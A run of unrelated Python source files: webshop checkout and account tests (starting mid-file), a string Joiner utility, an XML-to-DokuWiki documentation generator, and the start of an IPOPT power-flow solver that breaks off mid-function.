self.assertIn('Asia/Kolkata', rv.data) def test_0055_guest_checkout(self): """ Test for guest checkout. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() self.create_test_products() app = self.get_app() product1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product2, = self.ProductTemplate.search([ ('name', '=', 'product 2') ]) country = self.Country(self.available_countries[0]) subdivision = country.subdivisions[0] with app.test_client() as c: rv = c.post( '/cart/add', data={ 'product': product1.products[0].id, 'quantity': 5 } ) self.assertEqual(rv.status_code, 302) rv = c.get('/checkout/sign-in') self.assertEqual(rv.status_code, 200) # Trying to checkout with a registered email. # Should fail. rv = c.post( '/checkout/sign-in', data={ 'email': 'email@example.com' } ) self.assertEqual(rv.status_code, 200) self.assertIn( '{0}'.format(self.registered_user.email), rv.data ) self.assertIn( 'is tied to an existing account', rv.data ) # Now with a new email. rv = c.post( '/checkout/sign-in', data={ 'email': 'new@example.com', 'checkout_mode': 'guest' } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/shipping-address') ) # Shipping address page should render. rv = c.get('/checkout/shipping-address') self.assertEqual(rv.status_code, 200) # Copied from nereid-checkout - adding shipping address. rv = c.post( '/checkout/shipping-address', data={ 'name': 'Sharoon Thomas', 'street': 'Biscayne Boulevard', 'streetbis': 'Apt. 1906, Biscayne Park', 'zip': 'FL33137', 'city': 'Miami', 'phone': '1234567890', 'country': country.id, 'subdivision': subdivision.id, } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/validate-address') ) # Copied from nereid-checkout - adding billing address. rv = c.post( '/checkout/billing-address', data={ 'name': 'Sharoon Thomas', 'street': 'Biscayne Boulevard', 'streetbis': 'Apt. 1906, Biscayne Park', 'zip': 'FL33137', 'city': 'Miami', 'phone': '1234567890', 'country': country.id, 'subdivision': subdivision.id, } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/payment') ) with Transaction().set_context(company=self.company.id): self._create_auth_net_gateway_for_site() # Try to pay using credit card rv = c.post( '/checkout/payment', data={ 'owner': 'Joe Blow', 'number': '4111111111111111', 'expiry_year': '2018', 'expiry_month': '01', 'cvv': '911', 'add_card_to_profiles': True, } ) self.assertEqual(rv.status_code, 302) self.assertTrue('/order/' in rv.location) self.assertTrue('access_code' in rv.location) sale, = self.Sale.search([('state', '=', 'confirmed')]) self.Sale.proceed([sale]) self.Sale.process_all_pending_payments() payment_transaction, = sale.gateway_transactions self.assertEqual(payment_transaction.amount, sale.total_amount) rv = c.get('/order/{0}'.format(sale.id)) self.assertEqual(rv.status_code, 302) # Orders page redirect def test_0060_registered_checkout(self): """ Test for registered user checkout. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() self.create_test_products() app = self.get_app() product1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product2, = self.ProductTemplate.search([ ('name', '=', 'product 2') ]) country = self.Country(self.available_countries[0]) subdivision = country.subdivisions[0] with app.test_client() as c: rv = c.post( '/cart/add', data={ 'product': product1.products[0].id, 'quantity': 5 } ) self.assertEqual(rv.status_code, 302) # Now sign in to checkout. rv = c.post( '/checkout/sign-in', data={ 'email': 'email@example.com', 'password': 'password', 'checkout_mode': 'account' } ) self.assertEqual(rv.status_code, 302) self.assertTrue(rv.location.endswith('/shipping-address')) # Shipping address page should render. rv = c.get('/checkout/shipping-address') self.assertEqual(rv.status_code, 200) # Copied from nereid-checkout - adding shipping address. rv = c.post( '/checkout/shipping-address', data={ 'name': 'Sharoon Thomas', 'street': 'Biscayne Boulevard', 'streetbis': 'Apt. 1906, Biscayne Park', 'zip': 'FL33137', 'city': 'Miami', 'phone': '1234567890', 'country': country.id, 'subdivision': subdivision.id, } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/validate-address') ) # Copied from nereid-checkout - adding billing address. rv = c.post( '/checkout/billing-address', data={ 'name': 'Sharoon Thomas', 'street': 'Biscayne Boulevard', 'streetbis': 'Apt. 1906, Biscayne Park', 'zip': 'FL33137', 'city': 'Miami', 'phone': '1234567890', 'country': country.id, 'subdivision': subdivision.id, } ) self.assertEqual(rv.status_code, 302) self.assertTrue( rv.location.endswith('/checkout/payment') ) with Transaction().set_context(company=self.company.id): self._create_auth_net_gateway_for_site() # Try to pay using credit card rv = c.post( '/checkout/payment', data={ 'owner': 'Joe Blow', 'number': '4111111111111111', 'expiry_year': '2018', 'expiry_month': '01', 'cvv': '911', 'add_card_to_profiles': '', } ) self.assertEqual(rv.status_code, 302) self.assertTrue('/order/' in rv.location) self.assertTrue('access_code' in rv.location) sale, = self.Sale.search([('state', '=', 'confirmed')]) self.Sale.proceed([sale]) self.Sale.process_all_pending_payments() payment_transaction, = sale.gateway_transactions self.assertEqual(payment_transaction.amount, sale.total_amount) rv = c.get('/order/{0}'.format(sale.id)) self.assertEqual(rv.status_code, 200) rv = c.get( '/order/{0}?access_code={1}' .format(sale.id, sale.guest_access_code) ) self.assertEqual(rv.status_code, 200) def test_0065_password_reset(self): """ Test for password reset. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: # Resetting without login rv = c.get('/reset-account') self.assertEqual(rv.status_code, 200) # Resetting through email response = c.post( '/reset-account', data={ 'email': 'email@example.com' } ) self.assertEqual(response.status_code, 302) # Login after requesting activation code. self.login(c, 'email@example.com', 'password') # Reset properly. with app.test_client() as c: response = c.post( '/reset-account', data={ 'email': 'email@example.com' } ) self.assertEqual(response.status_code, 302) # Resetting with an invalid code. # Login with new pass should be rejected. invalid = 'badcode' response = c.post( '/new-password/{0}/{1}'.format( self.registered_user.id, invalid ), data={ 'password': 'reset-pass', 'confirm': 'reset-pass' } ) self.assertEqual(response.status_code, 302) response = c.post( '/login', data={ 'email': 'email@example.com', 'password': 'reset-pass' } ) # rejection self.assertEqual(response.status_code, 200) # Now do it with the right code. # This time, login with old pass should be rejected. response = c.post( self.registered_user.get_reset_password_link(), data={ 'password': 'reset-pass', 'confirm': 'reset-pass' } ) self.assertEqual(response.status_code, 302) response = c.post( '/login', data={ 'email': 'email@example.com', 'password': 'password' } ) self.assertEqual(response.status_code, 200) self.login(c, 'email@example.com', 'reset-pass') def test_0070_change_password(self): """ Test for password change. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() data = { 'party': self.party2.id, 'display_name': 'Registered User', 'email': 'email@example.com', 'password': 'password', 'company': self.company.id } with app.test_client() as c: response = c.get('/change-password') # Without login self.assertEqual(response.status_code, 302) # Try POST, but without login response = c.post('/change-password', data={ 'password': data['password'], 'confirm': data['password'] }) self.assertEqual(response.status_code, 302) # Now login self.login(c, data['email'], data['password']) # Incorrect password confirmation response = c.post( '/change-password', data={ 'password': 'new-password', 'confirm': 'oh-no-you-dont' } ) self.assertEqual(response.status_code, 200) self.assertTrue("must match" in response.data) # Send proper confirmation but without old password. response = c.post( '/change-password', data={ 'password': 'new-pass', 'confirm': 'new-pass' } ) self.assertEqual(response.status_code, 200) # Send proper confirmation with wrong old password response = c.post( '/change-password', data={ 'old_password': 'passw', 'password': 'new-pass', 'confirm': 'new-pass' } ) self.assertEqual(response.status_code, 200) self.assertTrue( 'current password you entered is invalid' in response.data ) # Do it right response = c.post( '/change-password', data={ 'old_password': data['password'], 'password': 'new-pass', 'confirm': 'new-pass' } ) self.assertEqual(response.status_code, 302) # Check login with new pass c.get('/logout') self.login(c, data['email'], 'new-pass') def test_0075_products(self): """ Tests product templates and variants. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: self.create_test_products() template1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) rv = c.get('/products') self.assertIn('product 1', rv.data) self.assertIn('product 2', rv.data) self.assertIn('product 3', rv.data) rv = c.get('/product/product-1') self.assertEqual(rv.status_code, 200) self.assertIn('product 1', rv.data) template1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) template1.active = False template1.save() rv = c.get('/product/product-1') self.assertEqual(rv.status_code, 404) def test_0080_search_results(self): """ Test the search results template. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: self.create_test_products() rv = c.get('/search?q=product') self.assertIn('product 1', rv.data) self.assertIn('product-1', rv.data) self.assertIn('product 2', rv.data) self.assertIn('product-2', rv.data) self.assertIn('product 3', rv.data) self.assertIn('product-3', rv.data) def test_0090_product_inventory(self): """ Tests the product template for cases of 'In Stock', 'Out Of Stock' and 'X <uom>s available'. """ StockMove = POOL.get('stock.move') with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() del self.templates['product.jinja'] app = self.get_app() self.create_test_products() template1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product1 = template1.products[0] with app.test_request_context('/'): # Check serialize method res = product1.serialize(purpose='variant_selection') self.assertIn('inventory_status', res) with app.test_client() as c: rv = c.get('/product/product-1') # No inventory made yet, and product is goods type self.assertIn('In stock', rv.data) # Let's create inventory website, = self.NereidWebsite.search([]) supplier, = self.Location.search([('code', '=', 'SUP')]) stock1, = StockMove.create([{ 'product': product1.id, 'uom': template1.sale_uom.id, 'quantity': 10, 'from_location': supplier, 'to_location': website.stock_location.id, 'company': website.company.id, 'unit_price': Decimal('1'), 'currency': website.currencies[0].id, 'planned_date': datetime.date.today(), 'effective_date': datetime.date.today(), 'state': 'draft', }]) StockMove.write([stock1], { 'state': 'done' }) product1.display_available_quantity = True product1.start_displaying_available_quantity = 10 product1.min_warehouse_quantity = 5 product1.save() # min_warehouse_quantity < quantity <= start_displaying with app.test_client() as c: rv = c.get('/product/product-1') # X <uom> available self.assertIn( str(product1.get_availability().get('quantity')) + ' ' + product1.default_uom.name, rv.data ) product1.start_displaying_available_quantity = 3 product1.save() # min_warehouse_quantity < quantity with app.test_client() as c: rv = c.get('/product/product-1') # In Stock self.assertIn('In stock', rv.data) product1.min_warehouse_quantity = 11 product1.save() # min_warehouse_quantity > quantity with app.test_client() as c: rv = c.get('/product/product-1') # Out Of Stock self.assertIn('Out of stock', rv.data) product1.min_warehouse_quantity = 0 product1.save() with app.test_client() as c: rv = c.get('/product/product-1') # Only in stock and out of stock cases self.assertIn('In stock', rv.data) product1.min_warehouse_quantity = -1 product1.save() with app.test_client() as c: rv = c.get('/product/product-1') # Always in stock self.assertIn('In stock', rv.data)
""" Defines Joiner class. """ from __future__ import absolute_import from __future__ import print_function from six.moves import map from six.moves import range from six.moves import zip __version__ = '1.0' __author__ = 'Pearu Peterson <pearu.peterson@gmail.com>' __all__ = ['Joiner'] import time class Joiner(object): """ Join a list of string values using specified rules. The following methods are defined: .__init__(*args, **options) - construct Joiner values from args. The options define the rules how the string values are joined together in __str__() method. .add(value, key=None) - add value to a join list. Adding different values with the same key is not allowed. Default key is time.time(). If key exists with equal values then adding a value is skipped. A typical applications for this behaviour would be avoiding redefining the same functions. .copy(mapping=lambda v:v, **new_options) - return a (mapped) copy with new options. .reversed_copy() - return a reversed copy. .__radd__(indent) - return an indented copy. .__iadd__(other) - add other in-place. .__add__(other) - return joined Joiner instances using the LHS options. .__str__() - return a joined string. Examples: >>> print Joiner('a','b',separator=':', prefix='<', suffix='>') <a:b> >>> print Joiner('a','b',separator=':', prefix='<', suffix='>', reverse=True) <b:a> >>> print Joiner('ab','b',separator=':', prefix='<', suffix='>', replace_map={'b':'c'}) <ac:c> >>> print Joiner('a','b',separator=':', prefix='<', suffix='>', use_indent=True, indent_offset=2) <a:b> >>> print Joiner(' a','b',separator=':', prefix='<', suffix='>', use_firstline_indent=True) < a:b> Note that the first value is raw-string: >>> print Joiner(r' a\\nb','c',separator=':', prefix='<', suffix='>', use_firstline_indent=True) < a: b:c> >>> print Joiner(default='hey', prefix='<', suffix='>') <hey> >>> print Joiner(default='hey', prefix='<', suffix='>', skip_prefix_when_empty=True) hey> >>> print Joiner(default='hey', prefix='<', suffix='>', skip_suffix_when_empty=True) <hey >>> print Joiner(default='hey', prefix='<', suffix='>', skip_prefix_suffix_when_single=True) hey >>> print Joiner('hey', prefix='<', suffix='>', skip_prefix_suffix_when_single=True) hey >>> c = Joiner(separator=', ', prefix='"', suffix='"') >>> c.add('hey',1) >>> c.add('hoo',2) >>> print c "hey, hoo" >>> c.add('hey',1) >>> c.add('hey2',1) Traceback (most recent call last): ... ValueError: Item 1 exists with different value >>> c2 = Joiner() >>> c2.add('bar') >>> c += c2 >>> print c "hey, hoo, bar" >>> c = Joiner(c_block_indent=True) >>> c += 'line 2' >>> c += 'line 3 {' >>> c += 'line 4 {\\n line 1' >>> c += '}' >>> c += '}' >>> c += 'line 5' >>> print c line 2 line 3 { line 4 { line 1 } } line 5 >>> print '==' + c ==line 2 ==line 3 { ==line 4 { == line 1 ==} ==} ==line 5 >>> c2 = Joiner(c_block_indent=True) >>> c2 += 'LINE 1 {' >>> c2 += c >>> c2 += '}' >>> print c2 LINE 1 { line 2 line 3 { line 4 { line 1 } } line 5 } """ default_options = dict( separator='\n', prefix='', suffix='', skip_prefix_when_empty=False, skip_suffix_when_empty=False, default = '', reverse=False, user_defined_str = None, use_indent = False, use_firstline_indent = False, # implies use_indent, the string values are assumed to contain r'\n' c_block_indent = False, # implies use_indent indent_offset = 0, replace_map = {}, ignore_empty_content = False, skip_prefix_suffix_when_single = False, check_func = None, ) def __init__(self, *args, **options): self.keys = [] self.values = [] self.dict = {} for o in options: if o not in self.default_options: raise KeyError("Unsupported keyword arguments: %r" % (o)) self.options = options.copy() list(map(self.add, args)) @property def use_indent(self): if self.options.get('use_indent'): return True return self.use_firstline_indent or self.c_block_indent def __getattr__(self, name): if name in self.options: return self.options[name] if name in self.default_options: return self.default_options[name] return getattr(super(Joiner, self), name) def add(self, value, key=None): assert isinstance(value, str),repr(type(value)) if key is None: key = time.time() for old, new in list(self.replace_map.items()): value = value.replace(old, new) if key in self.dict: v = self.dict[key] if v != value: raise ValueError("Item %r exists with different value" % (key)) return if not value and self.ignore_empty_content: return self.keys.append(key) self.values.append(value) self.dict[key] = value def __iadd__(self, other): if isinstance(other, type(self)): for key, value in zip(other.keys, other.values): self.add(value, key) elif isinstance(other, list): for item in other: self += item elif isinstance(other, tuple): key, value = other self.add(value, key) else: self.add(other) return self def __radd__(self, indent): cpy = self.copy() for i in range(len(cpy.values)): cpy.values[i] = (indent+cpy.values[i].replace('\n','\n'+indent)) return cpy def __add__(self, other): cpy = self.copy() cpy += other return cpy def __str__(self): if self.user_defined_str is not None: return self.user_defined_str(self) if self.check_func is not None: self.check_func(self) if self.values: l = self.values if self.reverse: l = l[:] l.reverse() if self.use_firstline_indent: # to indent documentation strings new_l = [] for l1 in l: lines = l1.split(r'\n') i = len(lines[0]) - len(lines[0].lstrip()) indent = i * ' ' new_l.append(lines[0]) new_l.extend([indent + l2 for l2 in lines[1:]]) l = new_l if self.c_block_indent: i = 0 new_l = [] for l1 in l: di = l1.count('{') - l1.count('}') i += di if di>0: indent = ' ' * (i-di) else: indent = ' ' * (i) for l2 in l1.split('\n'): new_l.append(indent + l2) l = new_l r = self.separator.join(l) if not (len(self.values)==1 and self.skip_prefix_suffix_when_single): r = self.prefix + r r = r + self.suffix else: r = self.default if not (r and self.skip_prefix_suffix_when_single): if not self.skip_prefix_when_empty: r = self.prefix + r if not self.skip_suffix_when_empty: r = r + self.suffix if r and self.use_indent: lines = r.splitlines(True) indent = self.indent_offset * ' ' r = ''.join([indent + line for line in lines]) return r def copy(self, mapping=None, **new_options): options = self.options.copy() options.update(**new_options) cpy = type(self)(**options) if mapping is None: cpy += self else: for key, value in zip(self.keys, self.values): cpy.add(mapping(value), key) return cpy def reverse_copy(self): cpy = self.copy(reverse=not self.reverse) cpy.keys.reverse() cpy.values.reverse() return cpy def _test(): import doctest doctest.testmod() if __name__ == "__main__": _test() print('ok')
#!/usr/bin/python # -*- coding: utf-8 -*- import sys import xml.etree.ElementTree as ET input_list = [] for arg in sys.argv[1:]: input_list.append(arg) if len(input_list) < 1: print("usage: makedoku.py <classes.xml>") sys.exit(0) def validate_tag(elem,tag): if (elem.tag != tag): print("Tag mismatch, expected '"+tag+"', got "+elem.tag); sys.exit(255) class_names=[] classes={} def make_class_list(class_list,columns): f=open("class_list.txt","wb") prev=0 col_max = len(class_list) / columns + 1 print("col max is ", col_max) col_count = 0 row_count = 0 last_initial = "" fit_columns=[] for n in range(0,columns): fit_columns+=[[]] indexers=[] last_initial="" idx=0 for n in class_list: col = idx/col_max if (col>=columns): col=columns-1 fit_columns[col]+=[n] idx+=1 if (n[:1]!=last_initial): indexers+=[n] last_initial=n[:1] row_max=0 for n in range(0,columns): if (len(fit_columns[n])>row_max): row_max=len(fit_columns[n]) for r in range(0,row_max): s="|" for c in range(0,columns): if (r>=len(fit_columns[c])): continue classname = fit_columns[c][r] initial=classname[0] if (classname in indexers): s+="**"+initial+"**|" else: s+=" |" s+="[["+classname.lower()+"|"+classname+"]]|" s+="\n" f.write(s) def dokuize_text(txt): return txt def dokuize_text(text): pos=0 while(True): pos = text.find("[",pos) if (pos==-1): break endq_pos=text.find("]",pos+1) if (endq_pos==-1): break pre_text=text[:pos] post_text=text[endq_pos+1:] tag_text=text[pos+1:endq_pos] if (tag_text in class_names): tag_text="[["+tag_text.lower()+"|"+tag_text+"]]" else: #command cmd=tag_text space_pos=tag_text.find(" ") if (cmd.find("html")==0): cmd=tag_text[:space_pos] param=tag_text[space_pos+1:] tag_text="<"+param+">" elif(cmd.find("method")==0): cmd=tag_text[:space_pos] param=tag_text[space_pos+1:] if (param.find(".")!=-1): class_param,method_param=param.split(".") tag_text="[["+class_param.lower()+"#"+method_param+"|"+class_param+'.'+method_param+"]]" else: tag_text="[[#"+param+"|"+param+"]]" elif (cmd.find("image=")==0): tag_text="{{"+cmd[6:]+"}}" elif (cmd.find("url=")==0): tag_text="[["+cmd[4:]+"|" elif (cmd=="/url"): tag_text="]]>" elif (cmd=="center"): tag_text="" elif (cmd=="/center"): tag_text="" elif (cmd=="br"): tag_text="\\\\\n" elif (cmd=="i" or cmd=="/i"): tag_text="//" elif (cmd=="b" or cmd=="/b"): tag_text="**" elif (cmd=="u" or cmd=="/u"): tag_text="__" else: tag_text="["+tag_text+"]" text=pre_text+tag_text+post_text pos=len(pre_text)+len(tag_text) #tnode = ET.SubElement(parent,"div") #tnode.text=text return text def make_type(t): global class_names if (t in class_names): return "[["+t.lower()+"|"+t+"]]" return t def make_method(f,name,m,declare,event=False): s=" * " ret_type="void" args=list(m) mdata={} mdata["argidx"]=[] for a in args: if (a.tag=="return"): idx=-1 elif (a.tag=="argument"): idx=int(a.attrib["index"]) else: continue mdata["argidx"].append(idx) mdata[idx]=a if (not event): if (-1 in mdata["argidx"]): s+=make_type(mdata[-1].attrib["type"]) else: s+="void" s+=" " if (declare): #span.attrib["class"]="funcdecl" #a=ET.SubElement(span,"a") #a.attrib["name"]=name+"_"+m.attrib["name"] #a.text=name+"::"+m.attrib["name"] s+="**"+m.attrib["name"]+"**" else: s+="[[#"+m.attrib["name"]+"|"+m.attrib["name"]+"]]" s+="**(**" argfound=False for a in mdata["argidx"]: arg=mdata[a] if (a<0): continue if (a>0): s+=", " else: s+=" " s+=make_type(arg.attrib["type"]) if ("name" in arg.attrib): s+=" "+arg.attrib["name"] else: s+=" arg"+str(a) if ("default" in arg.attrib): s+="="+arg.attrib["default"] argfound=True if (argfound): s+=" " s+="**)**" if ("qualifiers" in m.attrib): s+=" "+m.attrib["qualifiers"] f.write(s+"\n") def make_doku_class(node): name = node.attrib["name"] f=open(name.lower()+".txt","wb") f.write("====== "+name+" ======\n") if ("inherits" in node.attrib): inh=node.attrib["inherits"].strip() f.write("**Inherits:** [["+inh.lower()+"|"+inh+"]]\\\\\n") if ("category" in node.attrib): f.write("**Category:** "+node.attrib["category"].strip()+"\\\\\n") briefd = node.find("brief_description") if (briefd!=None): f.write("===== Brief Description ======\n") f.write( dokuize_text(briefd.text.strip())+"\n" ) methods = node.find("methods") if(methods!=None and len(list(methods))>0): f.write("===== Member Functions ======\n") for m in list(methods): make_method(f,node.attrib["name"],m,False) events = node.find("signals") if(events!=None and len(list(events))>0): f.write("===== Signals ======\n") for m in list(events): make_method(f,node.attrib["name"],m,True,True) members = node.find("members") if(members!=None and len(list(members))>0): f.write("===== Member Variables ======\n") for c in list(members): s = " * " s+=make_type(c.attrib["type"])+" " s+="**"+c.attrib["name"]+"**" if (c.text.strip()!=""): s+=" - "+c.text.strip() f.write(s+"\n") constants = node.find("constants") if(constants!=None and len(list(constants))>0): f.write("===== Numeric Constants ======\n") for c in list(constants): s = " * " s+="**"+c.attrib["name"]+"**" if ("value" in c.attrib): s+=" = **"+c.attrib["value"]+"**" if (c.text.strip()!=""): s+=" - "+c.text.strip() f.write(s+"\n") descr=node.find("description") if (descr!=None and descr.text.strip()!=""): f.write("===== Description ======\n") f.write(dokuize_text(descr.text.strip())+"\n") methods = node.find("methods") if(methods!=None and len(list(methods))>0): f.write("===== Member Function Description ======\n") for m in list(methods): d=m.find("description") if (d==None or d.text.strip()==""): continue f.write("== "+m.attrib["name"]+" ==\n") make_method(f,node.attrib["name"],m,False) f.write("\\\\\n") f.write(dokuize_text(d.text.strip())) f.write("\n") """ div=ET.Element("div") div.attrib["class"]="class"; a=ET.SubElement(div,"a") a.attrib["name"]=node.attrib["name"] h3=ET.SubElement(a,"h3") h3.attrib["class"]="title class_title" h3.text=node.attrib["name"] briefd = node.find("brief_description") if (briefd!=None): div2=ET.SubElement(div,"div") div2.attrib["class"]="description class_description" div2.text=briefd.text if ("inherits" in node.attrib): ET.SubElement(div,"br") div2=ET.SubElement(div,"div") div2.attrib["class"]="inheritance"; span=ET.SubElement(div2,"span") span.text="Inherits: " make_type(node.attrib["inherits"],div2) if ("category" in node.attrib): ET.SubElement(div,"br") div3=ET.SubElement(div,"div") div3.attrib["class"]="category"; span=ET.SubElement(div3,"span") span.attrib["class"]="category" span.text="Category: " a = ET.SubElement(div3,"a") a.attrib["class"]="category_ref" a.text=node.attrib["category"] catname=a.text if (catname.rfind("/")!=-1): catname=catname[catname.rfind("/"):] catname="CATEGORY_"+catname if (single_page): a.attrib["href"]="#"+catname else: a.attrib["href"]="category.html#"+catname methods = node.find("methods") if(methods!=None and len(list(methods))>0): h4=ET.SubElement(div,"h4") h4.text="Public Methods:" method_table=ET.SubElement(div,"table") method_table.attrib["class"]="method_list"; for m in list(methods): # li = ET.SubElement(div2, "li") method_table.append( make_method_def(node.attrib["name"],m,False) ) events = node.find("signals") if(events!=None and len(list(events))>0): h4=ET.SubElement(div,"h4") h4.text="Events:" event_table=ET.SubElement(div,"table") event_table.attrib["class"]="method_list"; for m in list(events): # li = ET.SubElement(div2, "li") event_table.append( make_method_def(node.attrib["name"],m,False,True) ) members = node.find("members") if(members!=None and len(list(members))>0): h4=ET.SubElement(div,"h4") h4.text="Public Variables:" div2=ET.SubElement(div,"div") div2.attrib["class"]="member_list"; for c in list(members): li = ET.SubElement(div2, "li") div3=ET.SubElement(li,"div") div3.attrib["class"]="member"; make_type(c.attrib["type"],div3) span=ET.SubElement(div3,"span") span.attrib["class"]="identifier member_name" span.text=" "+c.attrib["name"]+" " span=ET.SubElement(div3,"span") span.attrib["class"]="member_description" span.text=c.text constants = node.find("constants") if(constants!=None and len(list(constants))>0): h4=ET.SubElement(div,"h4") h4.text="Constants:" div2=ET.SubElement(div,"div") div2.attrib["class"]="constant_list"; for c in list(constants): li = ET.SubElement(div2, "li") div3=ET.SubElement(li,"div") div3.attrib["class"]="constant"; span=ET.SubElement(div3,"span") span.attrib["class"]="identifier constant_name" span.text=c.attrib["name"]+" " if ("value" in c.attrib): span=ET.SubElement(div3,"span") span.attrib["class"]="symbol" span.text="= " span=ET.SubElement(div3,"span") span.attrib["class"]="constant_value" span.text=c.attrib["value"]+" " span=ET.SubElement(div3,"span") span.attrib["class"]="constant_description" span.text=c.text # ET.SubElement(div,"br") descr=node.find("description") if (descr!=None and descr.text.strip()!=""): h4=ET.SubElement(div,"h4") h4.text="Description:" make_text_def(node.attrib["name"],div,descr.text) # div2=ET.SubElement(div,"div") # div2.attrib["class"]="description"; # div2.text=descr.text if(methods!=None or events!=None): h4=ET.SubElement(div,"h4") h4.text="Method Documentation:" iter_list = [] if (methods!=None): iter_list+=list(methods) if (events!=None): iter_list+=list(events) for m in iter_list: descr=m.find("description") if (descr==None or descr.text.strip()==""): continue; div2=ET.SubElement(div,"div") div2.attrib["class"]="method_doc"; div2.append( make_method_def(node.attrib["name"],m,True) ) #anchor = ET.SubElement(div2, "a") #anchor.attrib["name"] = make_text_def(node.attrib["name"],div2,descr.text) #div3=ET.SubElement(div2,"div") #div3.attrib["class"]="description"; #div3.text=descr.text return div """ for file in input_list: tree = ET.parse(file) doc=tree.getroot() if ("version" not in doc.attrib): print("Version missing from 'doc'") sys.exit(255) version=doc.attrib["version"] for c in list(doc): if (c.attrib["name"] in class_names): continue class_names.append(c.attrib["name"]) classes[c.attrib["name"]]=c class_names.sort() make_class_list(class_names,4) for cn in class_names: c=classes[cn] make_doku_class(c)
#------------------------------------------------------------------------------ # Copyright (C) 2007-2010 Richard Lincoln # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #------------------------------------------------------------------------------ """ Defines an OPF solver for Pylon using IPOPT. """ #------------------------------------------------------------------------------ # Imports: #------------------------------------------------------------------------------ import pyipopt from numpy import \ array, polyder, polyval, exp, conj, Inf, ones, r_, zeros, asarray from scipy.sparse import lil_matrix, csr_matrix, hstack, vstack from pylon import REFERENCE from pylon.solver import _Solver, SFLOW, IFLOW, PFLOW #------------------------------------------------------------------------------ # "IPOPFSolver" class: #------------------------------------------------------------------------------ class IPOPFSolver(_Solver): """ Solves AC optimal power flow using IPOPT. """ def __init__(self, om, flow_lim=SFLOW, opt=None): """ Initialises a new IPOPFSolver instance. """ super(IPOPFSolver, self).__init__(om) #: Quantity to limit for branch flow constraints ("S", "P" or "I"). self.flow_lim = flow_lim #: Options for the PIPS. self.opt = {} if opt is None else opt def _ref_bus_angle_constraint(self, buses, Va, xmin, xmax): """ Adds a constraint on the reference bus angles. """ refs = [bus._i for bus in buses if bus.type == REFERENCE] Varefs = array([b.v_angle for b in buses if b.type == REFERENCE]) xmin[Va.i1 - 1 + refs] = Varefs xmax[Va.iN - 1 + refs] = Varefs return xmin, xmax def solve(self): """ Solves AC optimal power flow. """ case = self.om.case base_mva = case.base_mva # TODO: Explain this value. self.opt["cost_mult"] = 1e-4 # Unpack the OPF model. bs, ln, gn, _ = self._unpack_model(self.om) # Compute problem dimensions. ipol, _, nb, nl, _, ny, nxyz = self._dimension_data(bs, ln, gn) # Compute problem dimensions. ng = len(gn) # gpol = [g for g in gn if g.pcost_model == POLYNOMIAL] # Indexes of constrained lines. il = array([i for i,l in enumerate(ln) if 0.0 < l.rate_a < 1e10]) nl2 = len(il) # Linear constraints (l <= A*x <= u). A, l, u = self.om.linear_constraints() # AA, bb = self._linear_constraints(self.om) _, xmin, xmax = self._var_bounds() # Select an interior initial point for interior point solver. x0 = self._initial_interior_point(bs, gn, xmin, xmax, ny) # Build admittance matrices. Ybus, Yf, Yt = case.Y # Optimisation variables. Va = self.om.get_var("Va") Vm = self.om.get_var("Vm") Pg = self.om.get_var("Pg") Qg = self.om.get_var("Qg") # Adds a constraint on the reference bus angles. # xmin, xmax = self._ref_bus_angle_constraint(bs, Va, xmin, xmax) def f_fcn(x, user_data=None): """ Evaluates the objective function. """ p_gen = x[Pg.i1:Pg.iN + 1] # Active generation in p.u. q_gen = x[Qg.i1:Qg.iN + 1] # Reactive generation in p.u. # Polynomial cost of P and Q. xx = r_[p_gen, q_gen] * base_mva if len(ipol) > 0: f = sum([g.total_cost(xx[i]) for i,g in enumerate(gn)]) else: f = 0 # Piecewise linear cost of P and Q. if ny: y = self.om.get_var("y") ccost = csr_matrix((ones(ny), (range(y.i1, y.iN + 1), zeros(ny))), shape=(nxyz, 1)).T f = f + ccost * x else: ccost = zeros((1, nxyz)) # TODO: Generalised cost term. return f def df_fcn(x, usr_data=None): """ Calculates gradient of the objective function. """ p_gen = x[Pg.i1:Pg.iN + 1] # Active generation in p.u. q_gen = x[Qg.i1:Qg.iN + 1] # Reactive generation in p.u. xx = r_[p_gen, q_gen] * base_mva if ny > 0: y = self.om.get_var("y") iy = range(y.i1, y.iN + 1) ccost = \ csr_matrix((ones(ny), (iy, zeros(ny))), shape=(nxyz, 1)).T else: ccost = zeros((1, nxyz)) # TODO: Generalised cost term. iPg = range(Pg.i1, Pg.iN + 1) iQg = range(Qg.i1, Qg.iN + 1) # Polynomial cost of P and Q. df_dPgQg = zeros((2 * ng, 1)) # w.r.t p.u. Pg and Qg # df_dPgQg[ipol] = matrix([g.poly_cost(xx[i], 1) for g in gpol]) # for i, g in enumerate(gn): # der = polyder(list(g.p_cost)) # df_dPgQg[i] = polyval(der, xx[i]) * base_mva for i in ipol: df_dPgQg[i] = \ base_mva * polyval(polyder(list(gn[i].p_cost)), xx[i]) df = zeros((nxyz, 1)) df[iPg] = df_dPgQg[:ng] df[iQg] = df_dPgQg[ng:ng + ng] # Piecewise linear cost of P and Q. df = df + ccost.T # TODO: Generalised cost term. return asarray(df).flatten() def g_fcn(x, usr_data=None): """ Evaluates the non-linear constraint values. """ Pgen = x[Pg.i1:Pg.iN + 1] # Active generation in p.u. 